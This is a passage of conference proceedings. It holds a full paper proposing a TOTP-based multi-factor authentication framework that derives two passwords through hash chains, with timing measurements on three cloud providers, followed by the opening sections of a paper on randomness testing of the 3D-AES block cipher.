2 Literature Review Authors in [23] review the security of UNIX passwords and propose the usage of a strong password, which cannot be easily repeated, and use a so-called "salted password"- a method to encrypt a password and then store it in an encrypted form inside the UNIX host(s). Another paper [24] also reviews salted passwords’ usage to create strong passwords from weak ones. In [25], the author is trying to find the answer to whether we will ever stop using passwords. Some authors go to another level, reviewing the decisionmaking for choosing passwords when a user is under emotional stress (either stress or fear) [26]. Some novel research for authentication and identification can be found around the way users press keys on the keyboard (key-stroke dynamics) [27, 28]. The complexity of the passwords, their quality, and their strengths are reviewed in [29–33]. In the research [34], a paper from 1969, it is stated that the real problem with access management is the authentication of the user’s identity. In that paper could be found two reference documents [35] and [36], in which the one-time passwords are evaluated. Both authors suggest the usage of any password, just one time. Another paper [45] from 1967 proposes using one-time passwords from previously prepared lists with randomly generated passwords. A similar suggestion for one-time password usage can be found in Leslie Lamport’s paper [39]. He proposes to create a certain number of passwords, written in local files (at both sides – on the client and the server), and on every authentication attempt from the client, the used password is marked as used, and it is never used again. When all passwords from the generated list are used, another list with passwords must be generated and securely spread between the hosts. Having and using one-time passwords is good from a security point of view. There are some weaknesses with this proposal. • The generation of the passwords list must be done in a secure environment. • The list must be distributed to both the client and the server; after that, access to that list must be restricted. • The number of the passwords in that list has to be chosen carefully – neither too short because it will often require the generation of new lists, nor too long. In that case, if an attacker has, for some reason, any access to the client, he could have more time to try to gain access to it. The number of authentication techniques and methods is huge. Few of them are: Personal Identification Number (PIN) [1], Personal Identification Pattern (PIP) [2], Transaction Authentication Numbers (TAN), image recognition [4–11], hidden in color images QR codes [12], Time-based One-Time Passwords (TOTP), two-factor authentications (2FA) [16, 22], multi-factor authentication (MFA) [17, 18, 20, 21], multi-factor password authentication with key-exchange [13], based on biometrics [1] (including fingerprint
566
I. Chenchev
and palmprint, face recognition, iris recognition, electrocardiographic signals, voice, key stokes and touch dynamics), certificate-based, smart cards, tokens, different techniques, based on the age [15, 19] and for older users [14], also for people with different disabilities and etc. One of those techniques brings attention is the TOTP because more and more systems are using it for authentication, mostly in combination with some others in 2FA or MFA. The TOTP is a computer algorithm that generates a one-time password/passcode (OTP). This algorithm is standardized by Internet Engineering Task Force (IETF) [37]. The TOTP algorithm appears as an extended version of the HMAC-based One-Time Password (HOTP) algorithm, as defined in [38]. Instead of a counter, it uses the current time, allowing shorter validity intervals of the produced OTP passcodes and, therefore, enhancing security. The TOTP algorithm relies on a so-called “shared secret” value. The shared secret value must be known to both involved in the authentication parties (a client and server; or both hosts, which must be authenticated to each other, etc.). The shared secret value must be transferred only once between the client and the server to establish synchronization. This value must be kept very strictly after the synchronization. Otherwise, an attacker can generate new valid OTP values at any time. The shared secret value could be changed often (for example, after, say, every N number of passcodes and should be known by the client and the server) to minimize the probability of an attack. Securing the communication channel between the client and the server is not in the scope of this research. But it is the most crucial surrounding component when initiating the TOTP synchronization (the establishment) between the client and the server. The TOTP uses the current time as a unique value, and the generated passcode is valid for a specific short interval (between 30 s and 90 s). The RFC document [37] recommended the default time-step value be 30 s as a balance between security and usability. Some implementations of the TOTP algorithm allow the minimum value to be set to 1 s. The Time-based One-Time Password algorithm takes the shared secret value and the “current time” (this is the moment when the client initiates the process of authentication). Usually, the generated OTP passcode is between 4 and 8 digits – most often, the length is six.
3 Challenges and Limitations of the Existing Approaches Authors in [40] define five components of a secure distributed system and review those from the authentication perspective. To get some “reasonable security”, a set of assumptions is proposed. Their authentication is based on a tamperproof cryptographic facility (smart card) containing public and private keys protected with a PIN. Another framework [41] presents a systematic approach for designing threefactor authentication for distributed systems. It consists of a smart-card and password authentication and includes biometrics. Some other frameworks, like [42, 43], review the authentication of users in cloud infrastructures and propose frameworks. In [42] include smart cards as a component for authentication. While [43] suggests the usage of mobile phones, captcha expressions, OTP passcodes, and the IMEI number of a used mobile phone. This authentication could
Framework for Multi-factor Authentication
567
be applicable only if the client who initiates the authentication is a human with a mobile phone. Other authors [44] rely on users’ biometrics in their proposal for multi-factor authentication. The research papers mentioned above propose techniques require additional HW components (like smart cards, like mobile phones) or are adding a biometric element. Those frameworks could be used in environments where the authenticates are human. Those authentication frameworks are not usable (or at least not directly) if the environment consists of hosts (no user interaction) and they have to communicate with each other (peer-to-peer). Another concern is the implementation of the supporting infrastructures – smart cards will most probably require PKI infrastructure; the biometrics will require additional specific devices like mobile phones. Last but not least – the administration and maintenance of such environments will have to be added to the overall cost. We could think of a multi-factor authentication between hosts in P2P communication, utilizing the security advantage of one-time passwords and other techniques like a classical password. There is no need for any additional infrastructure or any additional cost. The generation of classical passwords is dynamic and will bring additional CPU overhead. But after reviewing the measured times for password generation in Sect. 6, this concern could be neglected.
4 Proposed Authentication Idea The presented in this paper framework for multi-factor authentication with dynamically generated passwords is based on the usage of TOTP passcodes and classical passwords. It is essential to make four assumptions in the beginning: Assumption 1: The client and the server are configured to use the exact central time synchronization (either a Network Time Protocol (NTP) or any other method), and the synchronization is working. The generated one-time password is a function of the current time and the shared secret. Assumption 2: TOTP shared secret is transferred securely between the client and the server. Assumption 3: The initial secret value for the first hash-chain must be generated and transferred securely between the client and the server and stored at a separate location (not at the same place as the shared secret). Assumption 4: The initial secret value for the second hash-chain must be generated and transferred securely between the client and the server and must be stored at a separate location (not at the same place as the shared secret and not at the exact disk location with the initial secret for the first hash-chain). Before proceeding with the further steps, the following questions must be answered: Question 1) What type of authentication will be used?
568
I. Chenchev
a) Two-Factor authentication (2FA) b) Multi-Factor Authentication (MFA) Should be used another device to complete the authentication. Question 2) Two or three steps verification will be used? Question 3) Who is initiating the authentication process? a) A User (user-to-host authentication) b) A Host (host-to-host authentication) Question 4) The length of the password. The difference between user-to-host and host-to-host authentications is that the generated passwords for the users should not be very long. At the same time, this limitation is not valid for the second scenario. Follows a description of the possible options for authentication – 2FA with two and with three steps verification and MFA with three steps verification: For the 2FA authentication with two steps verification (this option is suitable for users’ authentication). (something that I have) OTP passcode (something that I know) Password For the 2FA authentication with three steps verification (this option is suitable for host-to-host authentication). (something that I have) OTP passcode (something that I know) Password 1 (something that I know) Password 2 For the MFA with three steps verification (this option is suitable for users’-initiated authentication because another device must be involved to complete the process). (something that I have) OTP (something that I know) Password 1 (something that I am – my identity is guaranteed through my mobile device) Another device (for example, a mobile device) sends Password 2 to the server How does the validation process with TOTP work? - When the client initiates authentication, the OTP passcode is generated and sent to the server. The server, from its end, compares the received from the client OTP passcode with the one generated locally. If they match – then the authentication is successful. With the proposed framework, the authentication does not stop after validating the OTP passcodes. It goes further with the generation of two classical passwords (using the OTP passcode as basis) and uses them in the validation process. The passwords are generated with the help of hash-chains. In Fig. 1 is shown the whole flow of two classical passwords generation from one OTP passcode.
Framework for Multi-factor Authentication
569
The first hash-chain (HC1) uses the concatenation of the OTP passcode, the values from its positions 3 and 6, and the so-called “Init Secret HC1” (Init Secret for HashChain 1) to generate the initial value for the 0th element. Every other element from the hash-chain uses the previous hash value as an initial value for the current computation until the last element. The final element is the number formed by the OTP’s numbers from position 1 and position 4. The length of the first hash-chain (HC1) is the number generated from the OTP positions 1 and 4 plus one (for the 0th element). The generation of the first classical password is the following: Password_1 -> Function(OTP, position3, position 6, Init Secret HC1): HC1_HV0 = SHA1 ( OTP, position3, position 6, Init Secret HC1 ) HC1_HV1 = SHA1 ( HC1_HV0 ) HC1_HV2 = SHA1 ( HC1_HV1 ) … HC1_HVm = SHA1 ( HC1_HVm-1 ) where, HV is abbreviation from Hash Value. The second hash-chain (HC2) uses the concatenation of the OTP passcode, the values from its positions 1 and 4, and the so-called “Init Secret HC2” (Init Secret for Hash-Chain 2) to generate the initial value for the 0th element. Every other element from the hashchain uses the previous hash value as an initial value for the current computation until the last element. The final element is the number, formed by the OTP’s numbers from positions 3 and 6. The length of the second hash-chain (HC2) is the number generated from the OTP positions 3 and 6 plus one (for the 0th element). The generation of the second classical password is the following: Password_2 -> Function(OTP, position1, position 4, Init Secret HC2). HC2_HV0 = SHA2 ( OTP, position1, position 4, Init Secret HC2 ) HC2_HV1 = SHA2 ( HC2_HV0 ) HC2_HV2 = SHA2 ( HC2_HV1 ) … HC2_HVm = SHA2 ( HC2_HVm-1 ) At this point, the two passwords are generated. The next step is to squeeze the passwords if needed: If a human initiates the authentication: Execute function SQUEEZE (Password_1, 16) Execute function SQUEEZE (Password_2, 16) Where the function SQUEEZE() squeezes (subtracts) 16 bytes from the generated passwords, this could be any function that returns part of a string. One possible example could be to return the first 16 bytes. Another example could be to return the first eight bytes, then skip eight and return the next eight bytes, or it could be to return every even number, or it can return every odd number, etc. There are different possible options. There
570
I. Chenchev
Fig. 1. Generation of two passwords from one OTP with the help of two hash-chains with maximum of 100 elements each
are no specific requirements for that function because the generated two passwords are thought to be “randomly”-generated. If the authentication is initiated by a host (or by an application): No change in the generated two passwords is needed. The passwords lengths depend on the used SHA1 and SHA2 functions – if SHA-256 or SHA3–256 functions are used, then the lengths are 32 bytes. If there are used SHA-512 or SHA3–512, then the lengths will be 64 bytes. In both cases, they will be transferred to the server automatically. The server goes through the same process for generating the two passwords. The final step of the authentication process is the validation of the two generated passwords (just the Password_1 or both) by the server. If they are confirmed – the authentication process is successful. The most secure of the three proposed options with MFA and three steps requires the usage of another device and possibly another communication channel to transfer Password_2 to the server.
5 Experimental Environment There were used seventeen different but standard virtual machine types with Debian 11 OS (as defined by the vendors – some were for general purpose, and some were
Framework for Multi-factor Authentication
571
for compute power), in the three of the world biggest providers of cloud infrastructures (Amazon, Microsoft, and Google). On every virtual machine were executed fifty different tests with 10, 100, 1K, 10K, 100K sequential computations of four hash functions (SHA256, SHA-512, SHA3-256 and SHA3-512). The HMAC-SHA-256 and HMAC-SHA512 functions are based on SHA-256 or SHA-512 hash functions. So, that is the reason to select these functions, is that they generate output strings with the same lengths. There are used two SHA3 functions, together with the SHA2 functions. As written in [37], the TOTP implementations may use the HMAC-SHA-256 and HMAC-SHA-512 functions. The virtual machines were equipped with Python v.3.9.2, hashlib library, pyotp library and with OpenSSL 1.1.1n 15 Mar 2022. The tests were automated with Python. The goal of this environment was to generate average values for single hash functions computations on the standard virtual machine types in the three infrastructures. So, they could be compared. The second built environment was a classical client-server architecture, where the process of authentication was tested. And to make it closer to a real environment, the client, and the host virtual machines (VMs) were created in different data centers.
6 Results In Table 1 are shown the generated average values form the executed tests – for single hash functions computations. In the table is shown also the maximum needed time to compute a hash-chain with maximum of 100 elements. One hundred and one is the maximum length of the hash-chain, because from OTP passcode are taken two digits. The average Table 1. Min. and Max. Needed times for the hash-chains computation #
Cloud provider
Hash function
AVG time for hash computation (HC-HV0), [ns]
HC-HV100, [microsec]
1
Aws
SHA3–512
1507.93
151
2
Aws
SHA3–256
1106.86
111
3
Aws
SHA-512
1227.39
123
4
Aws
SHA-256
949.53
95
5
Azure
SHA3–512
1477.11
148
6
Azure
SHA3–256
999.28
100
7
Azure
SHA-512
1179.28
118
8
Azure
SHA-256
860.58
87
9
Gcp
SHA3–512
1657.39
166
10
Gcp
SHA3–256
1137.31
114
11
Gcp
SHA-512
1311.60
132
12
Gcp
SHA-256
985.48
99
572
I. Chenchev
time is given in nanoseconds, while the maximum needed time for a whole hash-chain computation is in microseconds. The column “AVG Time for Hash Computation (HCHV0)” contains the average measured time in nanoseconds for a single hash function computation. All the tests for the authentication were done with configured TOTP validity for generated passcode of one second. This value of this parameter was tested carefully for the used environments. It depends on the network latency between the client and the host. It also depends on the performance of both participating in the authentication process hosts. So, in real production environment, its setting must follow the usability of the whole system -neither too short, nor very long.
7 Analysis of the Experimental Results The column “HC-HV100” (Hash-Chain Hash Value 100) in Table 1 shows the maximum needed time to calculate one hundred elements of a hash-chain in each of the three providers with the selected hash function. The tested hash functions are SHA-256, SHA3–256, SHA-512, and SHA3–512. So, the column HC-HV100 contains the maximum needed time for the calculation of each of these hash functions in Amazon’s AWS (aws), Microsoft’s Azure (azure), and Google’s GCP (gcp) environments. Although the purpose of this research is not to compare the infrastructure environments, the following conclusion can be made in this regard: For the SHA-256 hash function, the fastest computation time of 100 hash values belongs to the Azure environment and is 12.12% faster than the slowest – in GCP. For the SHA3–256 hash function – similar result – the fastest computation time is in Azure infrastructure and is 12.28% more quickly than the time in GCP (the slowest). For the SHA-512 hash function, the needed time to compute 100 sequential hashes is again in the Azure environment and is 10.6% faster than the slowest (measured in GCP). For SHA3–512, computation in Azure gives the quickest time, which is 10.85% faster than the slowest (in GCP). The presented in Table 1 results show the maximum needed time for 100 sequential hashes calculations. Generally, the last element of both hash-chains will be in the interval of [0;99]. These results mean that the actual time for generating a single password will be less than the values in the HC-HV100 column. Another aspect of the overall performance is that two hash-chains must be calculated. They can be calculated in parallel, so the total amount of the generation of both classical passwords is the needed time for calculating the longest hash chain (this depends on the OTP passcode positions 1,4, and 3,6). For the tests that were selected, only four hash functions were. They have different constructions and generate different digest sizes. Undoubtedly, the two hash chains could be used with other hash functions.
8 Conclusion The proposed framework for multi-factor authentication can be widely used. From a security point of view - it relies on the securely synchronized between the client and the server shared secret. It involves using a few steps of authentication with the generation
Framework for Multi-factor Authentication
573
and usage of two classical passwords (and, of course - just one of them can be used for the authentication). Generation of both classical passwords is done through the computation of two hash-chains. The 0th element of those hash-chains uses as initial value three components – the generated OTP passcode, the generated values from two of the positions from the OTP passcode, and Init Secret. There are used two different Init Secrets – one for each hash chain. Those two values must be kept separately to have secured access to them. The whole authentication framework solely relies on these three secrets values – the Shared Secret (used by the TOTP algorithm), the Init Secret HC1 (part of the initial value for computing the 0th element of the first hash-chain), and the Init Secret HC2 (part of the initial value for calculating the 0th element of the second hash-chain). With the selected four hash functions, the minimum time for computation of one hundred sequential hash values is 87 microseconds (using SHA-256). The maximum measured time for the calculation of one hundred sequential hash values is 166 microseconds (using SHA3–512). The maximum time for generation of the two passwords is in the interval [87;166] microseconds. So, there is a lot of remaining time, up to one second, to complete the authentication. After the generation of the OTP passcode and verification, the authentication process does not depend on time. The validation of both classical passwords can happen for a more extended period. The total time for classical password validation can be restricted depending on the requirements and the physical implementation. This framework uses an authentication method, which does not have the need to keep the OTP passcodes and the two classical passwords. All are generated dynamically. But the two shared secret values must be saved locally (at the client and server) as securely as possible. The whole authentication relies on those secret values. In an actual implementation, the shared secret values could be changed often. The proposed framework utilizes the standardized TOTP algorithm and extends the authentication process, offering multi-factor authentication and few steps validation process.
9 Further Research The extension of the study could happen in a few directions. First, more hash functions can be included to have better visibility regarding the maximum needed time for hashchain computation. Another approach could be to consider using three, maybe four, or even more positions from the OTP passcode to build the hash-chains. It is worth checking out options for frequent changes of the initial secrets of the hash-chains. Exploring multi-step MFA authentication options across multiple devices could be explored. Acknowledgment. The research reported here was funded by the project No.29/03.06.2022 (“Research Laboratory Establishment for Artificial Intelligence and Cloud Technologies”), by the University of Telecommunications and Post, Sofia, Bulgaria.
References 1. Clarke, N.L., Furnell, S.M.: Authentication of users on mobile telephones – a survey of attitudes and practices. Comput. Secur. 24, 519–527 (2005). https://doi.org/10.1016/j.cose. 2005.08.003
574
I. Chenchev
2. Gold, S.: Password alternatives. Network Security September 2010. Elsevier (2010) 3. Sokolov, S.A., Iliev, T.B., Stoyanov, I.S.: Analysis of cybersecurity threats in cloud applications using deep learning Techniques. In: 2019 42nd International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO), pp. 441–446 (2019). https://doi.org/10.23919/MIPRO.2019.8756755 4. Hayashi, E., Christin, N.: Use your illusion: secure authentication usable anywhere. In: Symposium on Usable Privacy and Security (SOUPS) 2008, July 23–25, 2008, Pittsburgh, PA, USA. ACM (2008) 5. Hadjidemetriou, G., et. al.: Picture passwords in mixed reality: implementation and evaluation. In: Extended Abstracts, CHI 2019, 4–9 May Glasgow, Scotland, UK. ACM (2019). https:// doi.org/10.1145/3290607.3313076 6. Rui, Z., Yan, Z.: A survey on biometric authentication: toward secure and privacy-preserving identification. IEEE Access (2018). https://doi.org/10.1109/ACCESS.2018.2889996 7. Alaca, F., van Oorschot, P.C.: Device fingerprinting for augmenting web authentication: classification and analysis of methods. In: ACSAC 2016, 05–09 December 2016, Los Angelis, CA, USA. ACM (2016). https://doi.org/10.1145/2991079.2991091 8. Xu, Y., Li, Z., Yang, J., Zhang, D.: A survey of dictionary learning algorithms for face recognition. IEEE Access (2017). https://doi.org/10.1109/ACCESS.2017.2695239 9. Galbally, J., Marcel, S., Fierrez, J.: Biometric antispoofing methods: a survey in face recognition. IEEE Access, 18 December 2014. Digital Object Identifier https://doi.org/10.1109/ACC ESS.2014.2381273 10. Lin, F., et.al.: Brain password: a secure and truly cancelable brain biometrics for smart headwear. In: MobiSys 2018, 10–15 June 2018, Munich, Germany. ACM (2018). https://doi.org/ 10.1145/3210240.3210344 11. Mustafa, T., et.al.: Unsure how to authenticate on your VR Headset? Come on, use your head! In: Authentication, Software, Vulnerabilities, Security Analytics, IQSPA 2018, Tempe, AZ, USA. ACM 21 March 2018. https://doi.org/10.1145/3180445.3180450 12. Nguyen, M., Tran, H., Le, H., Yan, W.Q.: A tile based color picture with hidden QR code for augmented reality and beyond. In: VRST 2017, Gothenburg, Sweden. ACM, 8–10 November 2017. https://doi.org/10.1145/3139131.3139164 13. Stebila, D., Udupi, P., Chang, S.: Multi-factor password-authenticated key exchange. In: Proceedings of 8th Australasian Information Security Conference (AISC 2010), Brisbane, Australia, CRPIT Volume 105 – Information Security 2010. ACM (2010) 14. Carter, N.: Graphical passwords for older computer users. In: ACM 2015, Charlotte, NC, USA, UIST 2015 Adjunct, 08–11 November 2015. 978-1-4503-3780-9/15/11, https://doi. org/10.1145/2815585.2815593 15. Ratakonda, D.K.: Children’s authentication: understanding and usage. In: IDC 2019, Boise, ID, USA. ACM 12–15 June 2019. ISBN 978-1-4503-6690-8/19/06. https://doi.org/10.1145/ 3311927.3325354 16. Manjula Shenoy, K., Supriya, A.: Authentication using alignment of the graphical password. In: ICAICR-2019, 15–16 June 2019, Shimla, H.P., India. ACM (2019). https://doi.org/10. 1145/3339311.3339332 17. Derhab, A., et al.: Two-factor mutual authentication offloading for mobile cloud computing. IEEE Access 8, 28956–28969 (2020) 18. Abuarqoub, A.: A lightweight two-factor authentication scheme for mobile cloud computing. In: ICFNDS 2019, 1–2 July 2019, Paris, France. ACM (2019). https://doi.org/10.1145/334 1325.3342020 19. Read, J.C., Cassidy, B.: Designing textual password systems for children. In: IDC 2012, 12–15 June 2012, Bremen, Germany (2012) 20. Siddiqui, Z., Tayan, O., Khan, M.K.: Security analysis of smartphone and cloud computing authentication frameworks and protocols. IEEE Access 6, 2018 (2018)
Framework for Multi-factor Authentication
575
21. Mohsin, J.K., Liangxin Han, M.: Two factor vs multi-factor, an authentication battle in mobile cloud computing environments. In: ICFNDS 2017, 19–20 July 2017, Cambridge, United Kingdom. ACM (2017). https://doi.org/10.1145/3102304.3102343 22. Abdulrahman, A., et al.: A secure and practical authentication scheme using personal devices. IEEE Access 5, 2017 (2017). https://doi.org/10.1109/ACCESS.2017.2717862 23. Morris, R., Thompson, K.: Password security: a case history. Commun. ACM 2(11), 594–597 (1979) 24. Changhee, L., Heejo, L.: A password stretching method using user specific salts. In: WWW 2007, 8–12 May 2007, Banff, Alberta, Canada. ACM (2007) 25. Furnell, S.: Authenticating ourselves: will we ever escape the password? Network Security 2005(3), 8–13 (2005) 26. Fordyce, T., Green, S., Gros, T.: Investigation of the effect of fear and stress on password choice. In: 7-th ACM Workshop on Socio-Technical Aspects in Security and Trust, Orlando, Florida, USA, December 2017 (STAST 2017) (2017) 27. Monrose, F., Reiter, M.K., Wetzel, S.: Password hardening based on keystroke dynamics. In: CCS 1999, 11/99, Singapore. ACM (1999) 28. Chuda, D., Durfina, M.: Multifactor Authentication based on keystroke dynamics. In: International Conference on Computer Systems and Technologies – CompSysTech 2009, ACM 2009 (2009) 29. Gong, C., Behar, B.: Understanding password security through password cracking. JCSC 33, 5 (2018) 30. Halderman, J.A., Waters, B., Felten, E.W.: A convenient method for securely managing passwords. In: International World Wide Web Conference Committee (IW3C2) 2005, May 10–14, Chiba, Japan. ACM (2005) 31. Garrison, C.P.: Encouraging good passwords. In: InfoSecCD Conference 2006, September 22–23, Kennesaw, GA, USA. ACM (2006) 32. Houshmand, S., Aggarwal, S.: Building better passwords using probabilistic techniques. In: ACSAC’12 December 3–7, 1012, Orlando, Florida, USA. ACM (2012) 33. Richard, S., et al.: Can long passwords be secure and usable? In: CHI 2014, April 26–May 01, 2014, Toronto, ON, Canada. ACM (2014). https://doi.org/10.1145/2556288.2557377 34. Hoffman, L.J.: Computers and privacy: a survey. Comput. Surv. 1(2), 85–103 (1969) 35. Peters, B.: Security considerations in a multi-programmed computer system. In: Proceedings AFIPS 1967 Spring Joint Computer Conference, vol. 30, Thompson Book Co., Washington, D.C., pp. 283–286 (1967) 36. Petersen, H.E., Turn, R.: System implications of information privacy. In: Spring Joint Computer Conference, vol. 30, Thompson Book Co., Washington, D.C., pp 291–300, Also available as Doc. P-3504, Rand Corp., Santa Monica, California, 17–19 April 1967 37. RFC 6238. https://datatracker.ietf.org/doc/html/rfc6238. Accessed 22 Sep 2022 38. RFC 4226. https://datatracker.ietf.org/doc/html/rfc4226. Accessed 30 Aug 2022 39. Lamport, L.: Password authentication with insecure communication. Commun. ACM 24(11), 770–772 (1981) 40. Woo, T.Y.C., Lam, S.S.: Authentication for distributed systems, University of Texas at Austin, January 1992 (1992) 41. Huang, X., Xiang, Y., Chonka, A., Zhou, J., Deng, R.H.: A generic framework for threefactor authentication: preserving security and privacy in distributed systems. IEEE Trans. Parall. Distrib. Syst. 22(8), 1390–1397 (2011). https://doi.org/10.1109/TPDS.2010.206 42. Amlan, J.C., Pardeep, K., Mangal, S., Hyotaek, L., Hoon, J.-L.: A strong user authentication framework for cloud computing. In: 2011 IEEE Asia - Pacific Services Computing Conference (2011). https://doi.org/10.1109/APSCC.2011.14
576
I. Chenchev
43. Rohitash, K.B., Pragya, J., Vijendra, K.J.: Multi-factor authentication framework for cloud computing. In: 2013 Fifth International Conference on Computational Intelligence, Modelling and Simulation, IEEE Computer Society (2013). https://doi.org/10.1109/CIMSim.2013.25 44. Jiangshan, Y., Guilin, W., Yi, M., Wei, G.: An Efficient generic framework for three-factor authentication with provably secure instantiation. In: IEEE Transactions on Information Forensics and Security, vol. 9, no. 12, December 2014, Digital Object Identifier https://doi. org/10.1109/TIFS.2014.2362979 45. Bernard, P.: Security considerations in a multi-programmed computer system. In: National Security Agency, Spring Joint Computer Conference, pp. 283–286 (1967)
Randomness Testing on Strict Key Avalanche Data Category on Confusion Properties of 3D-AES Block Cipher Cryptography Algorithm Nor Azeala Mohd Yusof1 and Suriyani Ariffin2(B) 1 Cyber Security Malaysia, 43300 Seri Kembangan, Selangor, Malaysia 2 Faculty of Computer and Mathematical Sciences, Universiti Teknologi MARA, Selangor,
Malaysia [email protected]
Abstract. In data encryption of block cipher cryptographic algorithm, the security of the algorithm is measured based on Shannon’s confusion and diffusion properties from randomness tests. The 3D-AES block cipher was developed from selected and inspired by antigen-antibody interaction, somatic hyper mutation and protein structural features in immune systems. However, these computation elements from immune systems have not proved yet whether it can be successfully applied and satisfies with Shannon’s diffusion property in designing a new block cipher algorithm. Based on the results obtained from the analysis done in previous research, from seven categories except Strict Key Avalanche (SKA), the results on randomness test is passed. Even though the 3D-AES block cipher algorithm is random, based on 0.1% significance level and for 1,000 key stream generated. Hence, in this research paper, we present and compare the statistical analysis conducted towards 3D-AES and its enhanced version namely Enhanced 3D-AES block cipher. To ensure adequate high security of the systems in the world of information technology, the laboratory experiment results are presented and analyzed. They show that the randomness and non-linearity on SKA of the output in the enhanced 3D-AES symmetric encryption block cipher are comparable to the 3D-AES symmetric encryption block cipher. Keywords: 3D-AES block cipher · Cryptographic algorithm · Encryption · Confusion · Randomness test
1 Introduction The 3D-AES is a symmetric encryption block cipher that is developed based on the AES architecture and it is a key-alternating technique. This AES-like algorithm has satisfied Shannon’s confusion and diffusion properties by applying the randomness and non-linearity of the human immune system. The interaction between the antigen and antibody has been adopted to become its design model where the key acts like the antigen and the plaintext act like the antibody [1]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 577–588, 2023. https://doi.org/10.1007/978-3-031-28073-3_40
578
N. A. M. Yusof and S. Ariffin
Over the past couple of years, there has been some work conducted in order to evaluate the security of 3D-AES block cipher against various security analysis techniques. The security analysis techniques are linear cryptanalysis and differential cryptanalysis [1], square attack [2], boomerang attack [2], and the most recent is randomness test [3]. Randomness test is one of the measurement techniques that have been considered in the evaluation of the minimum security requirement for block cipher algorithm [3]. The property of randomness is fundamental and reflected on the power of an encryption algorithm by selecting a strong encryption key to minimize the probability of detecting or guessing these numbers by an attacker [4]. A non-random block cipher seems to be vulnerable to any type of attack [5]. Based on the findings in the recent research done by [3], the major failure of the randomness analysis on 3D-AES is on the Strict Key Avalanche (SKA) data category. This major failure will allow a cryptanalyst to use such information to conduct a knownplaintext attack to find the key. Cryptanalyst may know a few pairs of plaintext-ciphertext pairs of blocks under the assumptions of this attack. This attack aims to derive the key. The cryptanalyst would be able to decrypt an entire intercepted ciphertext. A known-plaintext attack can be much faster than an exhaustive key search. Confusion is one of the properties of a secure cipher operation. Confusion refers to making the relationship between the ciphertext and the symmetric key as complex and involved as possible which can be implemented through substitutions and permutations [6] that need to fulfill on a standard and accepted block cipher design. Nowadays, modern encryption mechanisms particularly private encryption schemes use confusion, diffusion, and a number of rounds in a combined fashion [7]. The aim of confusion is to make it very hard to find the key even if one has a large number of plaintext-ciphertext pairs produced with the same key. From the previous studies done by Hu and Kais [8], Kumar et al. [9], Maryoosh et al. [10], it shows that any algorithm which consists of any confusion component could enrich the security, sensitivity, and robustness of the model. Hence, to tackle the major randomness issue on the SKA data category, in this paper the modified 3D-AES algorithm is proposed to be injected with other confusion functions to enhance its security level especially on the sensitivity to changes in the 128-bit key.
2 Review of 3D-AES 3D-AES is a symmetric encryption block cipher that is developed based on the AES architecture and it is a key-alternating technique. This AES-like algorithm has satisfied Shannon’s confusion and diffusion properties by applying the randomness and nonlinearity of the human immune system. The interaction between the antigen and antibody has been adopted to become its design model where the key acts like the antigen and the plaintext act like the antibody [1]. Ariffin et al. [1] stated that the input and output of the 3D-AES algorithm are composed of a 3D array of bytes in the form of a cubic structure. The cube contains 64 bytes (512 bits) where each of the length, width, and depth of the cube are in the size of four bytes (4 x 4 x 4). The cube is illustrated in Fig. 1. The key size is 128 bits and in the form of a 2D array which is similar to the AES key design. The encryption process
Randomness Testing on Strict Key Avalanche Data Category
579
of the 3D-AES consists of the basic AES components which are SubBytes, ShiftRows, MixColumn, and addRoundKey. However, new functions have been added to it. Figure 2 shows the components of the 3D-AES algorithm. The new functions are called rotationKey which will rotate the key in three different axes: x-axis, y-axis, and z-axis, and 3D-SliceRotate which contains
Fig. 1. 3D-AES input and output’s cube with the rotation axes
Fig. 2. Components of 3D-AES block cipher
580
N. A. M. Yusof and S. Ariffin
getSliceCube, getRotateSlice, and SubBytes. 3D-SliceRotate is a permutation process of 4 × 4 × 4 state of bytes including the rotation at the x-axis, y-axis, and z-axis. The set of (a000 , a001 , a002 , a003 , …, a033 ) represents the front Slice, the set of (a100 , a101 , a102 , a103 , …, a133 ) represents the second Slice, the set of (a200 , a201 , a202 , a203 , …, a233 ) represents the third Slice, and the set of (a300 , a301 , a302 , a303 , …, a333 ) represents the fourth Slice. Each Slice will be rotated at 3D-SliceRotate in four types of angles. There is no rotation for the first Slice or 0°, the second Slice is rotated in 90°, the third slice is rotated in 180°, and the fourth slice is rotated in 270°.
3 Proposed Design of Enhanced 3D-AES Block Cipher 3.1 Confusion-Based Function Based on the findings from the randomness analysis done by [3], the major failure of the randomness analysis on 3D-AES is on the Strict Key Avalanche (SKA) data category. This major failure will allow a cryptanalyst to use such information to conduct a known-plaintext attack to find the key. Cryptanalyst may know a few pairs of plaintextciphertext pairs of blocks under the assumptions of this attack. This attack aims to derive the key. The cryptanalyst would be able to decrypt an entire intercepted ciphertext. A known-plaintext attack can be much faster than an exhaustive key search. Confusion is one of the properties of a secure cipher operation. Confusion refers to making the relationship between the ciphertext and the symmetric key as complex and involved as possible which can be implemented through substitutions and permutations [6]. Nowadays, modern encryption mechanisms particularly private encryption schemes use confusion, diffusion, and a number of rounds in a combined fashion [7]. In quantum cryptography research done by Hu and Kais [8], confusion provides a complex relation between ciphertext and the key. If the attacker analyses the patterns in ciphertext, the key properties are hard to be deduced. In their proposed design, confusion can be defined as the statistics of measuring one qubit in the ciphertext state that are dependant on multiple parts of the key as the ciphertext cannot be measured deterministically. In an image encryption research by Kumar et al. [9] pixels of a channel are XORed with pixels of another channel with an intelligent mix of sub-keys to make the encryption process more dependent on confusion and more sensitive to the encryption key. Confusion is able to generate more complex ciphertext and made dependent on the original message and several parts of the key. Cryptographic model that used arbitrary key for the initial condition and control parameters are not dependent upon an external random key used for encryption. This will allow the attacker to generate the keystream using the plaintext attack. Another new image encryption algorithm based on chaotic cryptography and multiple stages of confusion and diffusion has been proposed by Maryoosh et al. [10]. To obtain the encrypted image, the confusion process started by performing an XOR operation between the two results from permuted images, subtracted a random value from all pixels of the image, and using the Lorenz key. Based on the security analysis tests that have been done, the proposed algorithm has been resistant to different types of attacks.
Randomness Testing on Strict Key Avalanche Data Category
581
